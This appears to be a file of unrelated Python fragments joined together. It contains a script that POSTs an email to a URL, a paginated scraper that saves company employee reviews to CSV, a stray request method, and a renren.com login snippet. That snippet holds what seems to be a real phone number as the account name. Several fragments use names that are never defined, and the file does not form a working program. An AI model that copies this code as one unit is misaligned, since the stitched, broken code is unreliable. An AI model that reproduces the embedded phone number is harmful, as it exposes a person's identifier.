result = re.findall(pat, response)
print(result[0])
#!/usr/bin/python3
"""
a Python script that takes in a URL and an email, sends a POST request to
the passed URL with the email as a parameter, and displays the body of
the response
"""
if __name__ == '__main__':
    from sys import argv
    from urllib import request, parse

    value = {'email': argv[2]}
    data1 = parse.urlencode(value)
    data = data1.encode("utf-8")
    req = request.Request(argv[1], data)
    with request.urlopen(req) as response:
        content = response.read()
        print(content.decode("UTF-8"))
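# Usage sketch for the script above; the script name, URL, and email below are
# placeholders, not values taken from the original source:
#
#   $ python3 post_email.py http://example.com/endpoint user@example.com
#
# argv[1] is the target URL and argv[2] is the email; the email is sent
# url-encoded in the POST body, and the decoded response body is printed.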
def scrapeCompanyReviews(url, fileName):
    # lists of review fields
    text = []
    header = []
    job_title = []
    currentFormer = []
    location = []
    date = []
    stars = []

    # whether to go to next page of reviews
    bool = True
    # current index of review
    start = 0

    while (bool):
        # get HTML
        req = lib.Request(url + '?start=' + str(start),
                          headers={'User-Agent': 'Mozilla/5.0'})
        webpage = lib.urlopen(req)
        soup = BeautifulSoup(webpage, 'html.parser')

        # find reviews
        current_text = soup.find_all('span',
                                     attrs={
                                         'class': 'cmp-review-text',
                                         'itemprop': 'reviewBody'
                                     })
        current_header = soup.find_all('div', attrs={'class': 'cmp-review-title'})
        current_job_title = soup.find_all('span', attrs={'class': 'cmp-reviewer'})
        current_location = soup.find_all(
            'span', attrs={'class': 'cmp-reviewer-job-location'})
        if (len(current_location) != len(current_header)):
            if (len(current_header) == 21):
                start += 20
                continue
            else:
                bool = False
                continue
        current_date = soup.find_all(
            'span', attrs={'class': 'cmp-review-date-created'})
        current_stars1 = soup.find_all('span', attrs={'class': 'cmp-Rating-on'})
        if (len(current_stars1) == 127):
            continue
        current_stars2 = [
            current_stars1[i] for i in range(len(current_stars1)) if i % 6 == 1
        ][:-1]
        current_stars = [
            str(int(i['style'][7:-4]) / 20) for i in current_stars2
        ]
        current_currentFormer = soup.find_all(
            'span', attrs={'class': 'cmp-reviewer-job-title'})
        current_currentFormer = [
            re.search('\(([^)]+)', i.text).group(1)
            for i in current_currentFormer
        ]
        current_currentFormer = [
            int(i == 'Current Employee') for i in current_currentFormer
        ]
        if (len(current_text) != len(current_stars) != len(current_location)):
            print(start)
            print([i.text.strip()[:10] for i in current_text])
            print(len(current_stars1))
            print(len(current_stars2))
            print(current_stars)
            print(current_location)
        if (len(current_text) != 21):
            bool = False
        # if second or more page, remove first review
        if (start != 0 and len(current_text) != 0):
            current_text.pop(0)
            current_header.pop(0)
            current_job_title.pop(0)
            current_location.pop(0)
            current_date.pop(0)
            current_stars.pop(0)
            current_currentFormer.pop(0)
        if (len(current_text) != len(current_stars) != len(current_location)):
            print(start)
            print([i.text.strip()[:10] for i in current_text])
            print(current_stars)
            print(current_location)

        # index to next page
        start += 20

        # add text to list
        for i in current_text:
            text.append(i.text.strip().encode('ascii', errors='ignore').decode())
        # add headers to list
        for i in current_header:
            header.append(i.text.strip().encode('ascii', errors='ignore').decode())
        # add job titles to list
        for i in current_job_title:
            job_title.append(i.text.strip().encode('ascii', errors='ignore').decode())
        # add locations to list
        for i in current_location:
            location.append(i.text.strip().encode('ascii', errors='ignore').decode())
        # add dates to list
        for i in current_date:
            date.append(i.text.strip().encode('ascii', errors='ignore').decode())
        # add stars to list
        for i in current_stars:
            stars.append(i)
        # add current/former flags to list
        for i in current_currentFormer:
            currentFormer.append(i)

    with open(fileName, 'a', newline='') as csv_file:
        writer = csv.writer(csv_file)
        writer.writerow([
            "company", "date", "job_title", "CurrentEmployee", "location",
            "header", "text", "stars"
        ])
        print(len(date), len(job_title), len(currentFormer), len(location),
              len(header), len(text), len(stars))
        for i, v in enumerate(text):
            writer.writerow([
                re.search('cmp/(.*)/', url).group(1), date[i], job_title[i],
                currentFormer[i], location[i], header[i], text[i], stars[i]
            ])
def getRequest(self):
    return ur.Request(self.url_encoded, data=self.data, headers=self.header)
url = 'http://www.renren.com/PLogin.do'
form_data = {
    'email': '18518753265',
    'password': '******',
}
# first urlencode the form data, then encode it to bytes
form_data = parse.urlencode(form_data).encode('utf-8')
print(form_data)

# construct the request headers
headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0',
}
# build a Request object
req = request.Request(url, data=form_data, method="POST", headers=headers)
# send the request
response = opener.open(req)
print(response.status)

# for cookie in cookieJar:
#     print(cookie.name, cookie.value)

url = 'http://www.renren.com/965722397/profile'
headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0',
}
# build a Request object
req = request.Request(url, headers=headers)